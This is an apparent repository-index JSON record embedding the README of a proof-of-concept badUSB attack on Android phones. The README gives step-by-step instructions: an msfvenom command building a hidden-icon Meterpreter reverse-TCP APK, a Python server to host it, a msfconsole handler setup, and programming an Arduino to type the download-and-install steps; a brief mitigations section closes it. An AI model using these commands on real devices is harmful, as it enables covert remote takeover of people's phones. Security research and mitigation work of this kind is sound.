{"id":13677738,"url":"https://github.com/caioau/badUSB-Targeting-Android","last_synced_at":"2025-04-29T11:31:52.501Z","repository":{"id":53859122,"uuid":"222323228","full_name":"caioau/badUSB-Targeting-Android","owner":"caioau","description":"a proof of concept badUSB attack which install a apk on Android","archived":false,"fork":false,"pushed_at":"2019-11-17T23:43:33.000Z","size":8722,"stargazers_count":117,"open_issues_count":0,"forks_count":22,"subscribers_count":9,"default_branch":"master","last_synced_at":"2024-11-11T19:42:05.552Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/caioau.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-11-17T22:51:31.000Z","updated_at":"2024-10-28T10:47:24.000Z","dependencies_parsed_at":"2022-08-23T18:31:54.295Z","dependency_job_id":null,"html_url":"https://github.com/caioau/badUSB-Targeting-Android","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/caioau%2FbadUSB-Targeting-Android","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/caioau%2FbadUSB-Targeting-Android/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/caioau%2FbadUSB-Targeting-Android/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/caioau%2FbadUSB-Targeting-Android/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/caioau","download_url":"https://codeload.github.com/caioau/badUSB-Targeting-Android/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251493945,"owners_count":21598201,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-02T13:00:46.402Z","updated_at":"2025-04-29T11:31:47.667Z","avatar_url":"https://github.com/caioau.png","language":"C++","funding_links":[],"categories":["C++"],"sub_categories":[],"readme":"# badUSB targeting Android (aka rubber duck) \n\nThis is a proof of concept of a badUSB attack targeting android, a Arduino is plugged into the phone's USB port (via OTG cable), then the Arduino is programmed to act as a keyboard, then it opens the Browser , Download, installs and runs a apk (a metasploit reverse shell).\n\nWhile you had to plug the Arduino into the phone, again this is a proof of concept, the attack can be embed into a charger or cable.  \n\nWatch the [screenRecord](screenRecord.mp4) or the [video](video.mp4) to see the attack in action!\n\n\n## Instructions:\n\nTo run this attack you have to:\n\n1. Generate and serve the apk.\n2. Keep the metasploit shell ready.\n3. Program the Arduino\n4. Plug the Arduino into the phone.\n\n### Generating the apk\n\n(You have to have metasploit installed) run:\n\n\u003e msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.201 LPORT=4444 AndroidHideAppIcon=true R \u003e /path/to/filename.apk\n\nset **LHOST** and **LPORT** accordingly \n\nthen serve the apk:\n\n```\ncd path/to/apk\npython3 -m http.server 8080\n```\n\n### Keeping the metasploit shell ready\n\nrun the following:\n\n```\nmsfconsole\nset payload android/meterpreter/reverse_tcp\nset LHOST 192.168.1.201\nset LPORT 4444\nuse exploit/multi/handler\nrun\n```\n\nset **LHOST** and **LPORT** accordingly \n\n### Program the Arduino\n\nIn this step I used a DIY Brazilian attiny85 board called [franzininho](https://franzininho.com.br/), It's the same as using a Digispark\n\nAfter you have prepared the Arduino IDE for the Digispark board, change the IP address and apkfilename in the [Arduino code](androidBadUsbvf.ino) then upload it to the board.\n\nFinally plug the Arduino into the Phone via the OTG cable.\n\n## Tested on:\n\nThe attack was successful on the following phones:\n\n* Moto G8 Plus (Doha): build fingerprint: motorola/doha/doha:9/PPI29.65-24/773d3:user/release-keys ; Security patch level: September 1, 2019; Chrome version 78.0.3904.96\n\n\n## Mitigations:\n\nIn order to mitigate this attack you could just leave the phone always locked when charging. \n\nBut I believe the Android should prevent this type of attack, Android could don't authorize USB devices and display a warning asking if the user really plugged a keyboard and if authorize it, similar to [usbguard](https://usbguard.github.io/);\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcaioau%2FbadUSB-Targeting-Android","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcaioau%2FbadUSB-Targeting-Android","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcaioau%2FbadUSB-Targeting-Android/lists"}